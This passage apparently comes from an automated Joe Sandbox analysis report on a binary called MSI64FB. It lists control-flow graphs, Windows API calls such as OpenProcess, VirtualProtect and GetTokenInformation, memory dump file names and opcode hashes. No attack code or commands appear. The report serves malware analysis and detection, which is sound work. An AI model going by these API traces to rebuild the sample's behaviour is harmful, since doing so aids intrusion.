                                                                                                                                                                                                                                                    control_flow_graph 0 7ff749f46ac0-7ff749f46b14 call 7ff749f457f0 3 7ff749f46b42-7ff749f46b84 CoInitializeEx CoCreateInstance 0->3 4 7ff749f46b16-7ff749f46b3d call 7ff749f472b0 0->4 6 7ff749f46b8e-7ff749f46be6 VariantInit 3->6 7 7ff749f46b86-7ff749f46b89 3->7 12 7ff749f471cc-7ff749f471ee call 7ff749f77d50 4->12 17 7ff749f46be8-7ff749f46beb 6->17 18 7ff749f46bf0-7ff749f46c19 IUnknown_QueryService 6->18 9 7ff749f471a6-7ff749f471ad 7->9 10 7ff749f471bd-7ff749f471c0 9->10 11 7ff749f471af-7ff749f471bc 9->11 14 7ff749f471c8 10->14 15 7ff749f471c2 CoUninitialize 10->15 11->10 14->12 15->14 21 7ff749f47183-7ff749f4718b 17->21 22 7ff749f46c1b-7ff749f46c1e 18->22 23 7ff749f46c23-7ff749f46c45 18->23 25 7ff749f4718d-7ff749f4719a 21->25 26 7ff749f4719b-7ff749f471a5 VariantClear 21->26 24 7ff749f4716b-7ff749f47173 22->24 29 7ff749f46c47-7ff749f46c4a 23->29 30 7ff749f46c4f-7ff749f46c7a 23->30 24->21 28 7ff749f47175-7ff749f47182 24->28 25->26 26->9 28->21 32 7ff749f47153-7ff749f4715b 29->32 36 7ff749f46c7c-7ff749f46c7f 30->36 37 7ff749f46c84-7ff749f46cac IUnknown_QueryInterface_Proxy 30->37 32->24 34 7ff749f4715d-7ff749f4716a 32->34 34->24 39 7ff749f4713b-7ff749f47143 36->39 40 7ff749f46cae-7ff749f46cb1 37->40 41 7ff749f46cb6-7ff749f46cd8 37->41 39->32 42 7ff749f47145-7ff749f47152 39->42 43 7ff749f47123-7ff749f4712b 40->43 47 7ff749f46cda-7ff749f46cdd 41->47 48 7ff749f46ce2-7ff749f46d0a IUnknown_QueryInterface_Proxy 41->48 42->32 43->39 45 7ff749f4712d-7ff749f4713a 43->45 45->39 49 7ff749f4710b-7ff749f47113 47->49 50 7ff749f46d0c-7ff749f46d0f 48->50 51 7ff749f46d14-7ff749f46d27 CoAllowSetForegroundWindow 48->51 49->43 56 7ff749f47115-7ff749f47122 49->56 53 7ff749f470f3-7ff749f470fb 50->53 54 7ff749f46d2d-7ff749f46d4f SysAllocString 51->54 55 7ff749f46faf-7ff749f46fbf SysAllocString 51->55 53->49 59 7ff749f470fd-7ff749f4710a 53->59 57 7ff749f46d5a-7ff749f46d76 SysAllocString 54->57 58 7ff749f46d51-7ff749f46d54 54->58 60 7ff749f471f5-7ff749f471ff call 7ff749f417d0 55->60 61 7ff749f46fc5 55->61 56->43 63 7ff749f46d78-7ff749f46d7b 57->63 64 7ff749f46d81-7ff749f46e36 VariantInit 57->64 58->57 62 7ff749f47206-7ff749f47210 call 7ff749f52630 58->62 59->49 72 7ff749f47200-7ff749f47205 call 7ff749f7de24 60->72 68 7ff749f46fca 61->68 70 7ff749f47211-7ff749f4721b call 7ff749f52630 62->70 63->64 63->70 80 7ff749f470bd-7ff749f470f2 VariantClear * 4 SysFreeString 64->80 81 7ff749f46e3c-7ff749f46e43 64->81 73 7ff749f46fd0-7ff749f46fd3 68->73 88 7ff749f4721c-7ff749f4723f call 7ff749f7de24 70->88 72->62 78 7ff749f47051-7ff749f47061 73->78 79 7ff749f46fd5-7ff749f46fe3 73->79 89 7ff749f470ad-7ff749f470b4 78->89 90 7ff749f47063-7ff749f4707f 78->90 84 7ff749f46ff0-7ff749f47023 OpenProcess WaitForSingleObject 79->84 85 7ff749f46fe5-7ff749f46fed call 7ff749f464a0 79->85 80->53 86 7ff749f470ba 81->86 87 7ff749f46e49-7ff749f46e4c 81->87 93 7ff749f47032-7ff749f47040 84->93 94 7ff749f47025-7ff749f47031 GetExitCodeProcess 84->94 85->84 86->80 91 7ff749f46e50-7ff749f46e6b 87->91 105 7ff749f47241-7ff749f4724e 88->105 106 7ff749f4724f-7ff749f47253 88->106 89->86 89->91 96 7ff749f47081-7ff749f47090 90->96 97 7ff749f47096-7ff749f47099 90->97 100 7ff749f46e72-7ff749f46e7b 91->100 93->78 99 7ff749f47042-7ff749f4704d CloseHandle 93->99 94->93 96->72 96->97 102 7ff749f4709b LocalFree 97->102 103 7ff749f470a1-7ff749f470a9 97->103 99->78 100->100 104 7ff749f46e7d-7ff749f46ee8 call 7ff749f43620 call 7ff749f43b80 call 7ff749f45a80 100->104 102->103 103->89 114 7ff749f46eea-7ff749f46f02 104->114 115 7ff749f46f24-7ff749f46f48 104->115 105->106 116 7ff749f46f19-7ff749f46f1c 114->116 117 7ff749f46f04-7ff749f46f13 114->117 118 7ff749f46f4a-7ff749f46f62 115->118 119 7ff749f46f84-7ff749f46fa8 115->119 116->115 120 7ff749f46f1e LocalFree 116->120 117->88 117->116 121 7ff749f46f79-7ff749f46f7c 118->121 122 7ff749f46f64-7ff749f46f73 118->122 119->68 123 7ff749f46faa-7ff749f46fad 119->123 120->115 121->119 125 7ff749f46f7e LocalFree 121->125 122->121 124 7ff749f471ef-7ff749f471f4 call 7ff749f7de24 122->124 123->73 124->60 125->119
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$Process$CreateCurrentDirectoryFreeInitializeInstanceLocalOpenTokenUninitializeWindows
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 822888269-0
                                                                                                                                                                                                                                                    • Opcode ID: 05dfd14b6fad02eb0e5439a3471fccad0f1740c3acfe04560c7ae6758e09d47f
                                                                                                                                                                                                                                                    • Instruction ID: 28d97d023186a8528c005a2be7f23ba3889977bdfd6332fb528d13ee773127e1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 05dfd14b6fad02eb0e5439a3471fccad0f1740c3acfe04560c7ae6758e09d47f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 58226B22B0DB82C9EB10BF65D8507A9A3B0FB95B98F905132DA4D57BA8DF3CE545C310
                                                                                                                                                                                                                                                    Function 00007FF749F90F78 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140librarymemoryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000000,00007FF749F9180E,?,?,?,00007FF749F91791), ref: 00007FF749F90FE5
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,00007FF749F9180E,?,?,?,00007FF749F91791), ref: 00007FF749F90FF7
                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000000,00007FF749F9180E,?,?,?,00007FF749F91791), ref: 00007FF749F91039
                                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE ref: 00007FF749F91095
                                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE ref: 00007FF749F910C6
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,00000000,00000000,00007FF749F9180E,?,?,?,00007FF749F91791), ref: 00007FF749F9110A
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000,00000000,00007FF749F9180E,?,?,?,00007FF749F91791), ref: 00007FF749F91116
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                    • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                                                                                                                                                                                                                    • API String ID: 740688525-1880043860
                                                                                                                                                                                                                                                    • Opcode ID: a892a654b5abf7ec54ac486c8a32eee7bee7496938f6da5fac79cc0bf8a6e840
                                                                                                                                                                                                                                                    • Instruction ID: 1ee42c2ee62e5709caa6cc17a508fbda8895bdb6e443f00226cfee4a6a447006
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a892a654b5abf7ec54ac486c8a32eee7bee7496938f6da5fac79cc0bf8a6e840
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A951AC21F0C646D1EB55BF56A8009B9A2B0AF4ABB4F981734DE3D077E4EF3CE4458220
                                                                                                                                                                                                                                                    Function 00007FF749F457F0 Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 215268677-0
                                                                                                                                                                                                                                                    • Opcode ID: 83c2ad7f33d6766a2455fcf55cb19f89b58c7c6f92fe8b6ef7896216a17a9331
                                                                                                                                                                                                                                                    • Instruction ID: 6391b48bffe0d597138582d96e2fe16dbd1786697e5d73f69c680d404841e5c1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 83c2ad7f33d6766a2455fcf55cb19f89b58c7c6f92fe8b6ef7896216a17a9331
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0801283271CA82C3EB50AF51E44439AB3B0FB91744F944026EB8D43A98CF7DC519CB14
                                                                                                                                                                                                                                                    Function 00007FF749F52410 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocCommandLineLocal
                                                                                                                                                                                                                                                    • String ID: Full command line:
                                                                                                                                                                                                                                                    • API String ID: 2661623471-831861440
                                                                                                                                                                                                                                                    • Opcode ID: 10fe9c3086584ecdcabbb76e3bc630f7c0bbf28254d0d94bbd84ecf09f4de2d3
                                                                                                                                                                                                                                                    • Instruction ID: 1c1169bfb27638f90c106a907cbcb376aed5eb2a2b70bf3efc5cb5877f88c050
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 10fe9c3086584ecdcabbb76e3bc630f7c0bbf28254d0d94bbd84ecf09f4de2d3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D417D12A5CA82E1EB00FF64D4515FEA370EFA0398FC05431EA4E57ADAEE6CD645C720
                                                                                                                                                                                                                                                    Function 00007FF749F47D90 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetTokenInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF749F47D7A), ref: 00007FF749F47DE1
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF749F47D7A), ref: 00007FF749F47DEB
                                                                                                                                                                                                                                                    • GetTokenInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF749F47D7A), ref: 00007FF749F47E5F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InformationToken$ErrorLast
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2567405617-0
                                                                                                                                                                                                                                                    • Opcode ID: 81ab0e5410798fe9c69e99d4eda4d9889cd92e25074a5a686ed3b1c35950dab2
                                                                                                                                                                                                                                                    • Instruction ID: 27a7c53f51e774f9b4a65698d6836e2d5b988282e90767695b89632c16157046
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 81ab0e5410798fe9c69e99d4eda4d9889cd92e25074a5a686ed3b1c35950dab2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE216D32B18B81CAE740AF25E54066AB3B5FB98BC4F648231DB4D43B98DF3CE4518B10
                                                                                                                                                                                                                                                    Function 00007FF749F7849C Relevance: 3.1, APIs: 2, Instructions: 94COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3070443116-0
                                                                                                                                                                                                                                                    • Opcode ID: 6cee35d11a79b8bb1112fc6f745af27cbdf9ac5f6833fa79e76764f6e9b4bfe5
                                                                                                                                                                                                                                                    • Instruction ID: dc8642de56a9548e49abe7ab9abd8a607fac71899a024b2490fd87ce7550098c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6cee35d11a79b8bb1112fc6f745af27cbdf9ac5f6833fa79e76764f6e9b4bfe5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F310421E1C542D5FB54BF64A4A53F9E2B1AF41354FC458B4FA0E5B2D3DE2CE8058270
                                                                                                                                                                                                                                                    Function 00007FF749F783B0 Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Initialize_invalid_parameter_noinfo_set_fmode
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3548387204-0
                                                                                                                                                                                                                                                    • Opcode ID: b1e6c70da2e61cc17f3a455e4fd642551ce0edfef17335b2559a393fc4bb5622
                                                                                                                                                                                                                                                    • Instruction ID: 8f9bf833a1cf82a683a6f06853d28de1f54ee8b3498747409755bfcc6da86065
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b1e6c70da2e61cc17f3a455e4fd642551ce0edfef17335b2559a393fc4bb5622
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F3117610E2D153D1FB98BFB148A62B9C2B15F90354FD508B8FA0D962C3EE6CE8554272
                                                                                                                                                                                                                                                    Function 00007FF749F950D8 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF749F8C16A,?,?,?,00007FF749F8C436,?,?,?,?,00007FF749F9A3C0,?,?,?), ref: 00007FF749F950EC
                                                                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF749F8C16A,?,?,?,00007FF749F8C436,?,?,?,?,00007FF749F9A3C0,?,?,?), ref: 00007FF749F95156
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: EnvironmentStrings$Free
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3328510275-0
                                                                                                                                                                                                                                                    • Opcode ID: 129f9ed9d6e46fbe024be29005a8f184e39638c1c551896208562cd4bf81eeca
                                                                                                                                                                                                                                                    • Instruction ID: e86f49903e2ac3757eee9386bacd59ee1296ada7b57771da085066beaf231132
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 129f9ed9d6e46fbe024be29005a8f184e39638c1c551896208562cd4bf81eeca
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D01A111F0C761C1EB20BF21641406AE770AF45BE4B884630DF6E17BC5DE2CF8828360
                                                                                                                                                                                                                                                    Function 00007FF749F8EC80 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __vcrt_uninitialize_ptd
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1180542099-0
                                                                                                                                                                                                                                                    • Opcode ID: 59d777d7a2a471f6221c9ac1909ae81a32853ae31e89e6473afd101fc85dda12
                                                                                                                                                                                                                                                    • Instruction ID: deab33de55c97879c2dd7bcb4a9dc964879da9c44ed7fd78389578a319e75304
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 59d777d7a2a471f6221c9ac1909ae81a32853ae31e89e6473afd101fc85dda12
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4EE01A64E1D252C1FB94BF34244E0B8E2B02F67310FD00935D02E612C2EF1CA0059630
                                                                                                                                                                                                                                                    Function 00007FF749F77F00 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF749F77F14
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F79F08: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF749F79F10
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F79F08: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FF749F79F15
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1208906642-0
                                                                                                                                                                                                                                                    • Opcode ID: b406c482bd6f2c871e11d82f4c101536c11149533ae63c44bb7f5e876bfe7ee7
                                                                                                                                                                                                                                                    • Instruction ID: 4e68b0e6713fab946a96faf936f2508cbf5b1bf9ec41a17c3b39db0c8925c740
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b406c482bd6f2c871e11d82f4c101536c11149533ae63c44bb7f5e876bfe7ee7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B8E09210D3CA42C1FF947E6116422F886740FA1344FD01CF8F45A461C3DE4EA05615B1
                                                                                                                                                                                                                                                    Function 00007FF749F919F0 Relevance: 1.5, APIs: 1, Instructions: 11memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 393 7ff749f919f0-7ff749f91a1f VirtualProtect
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
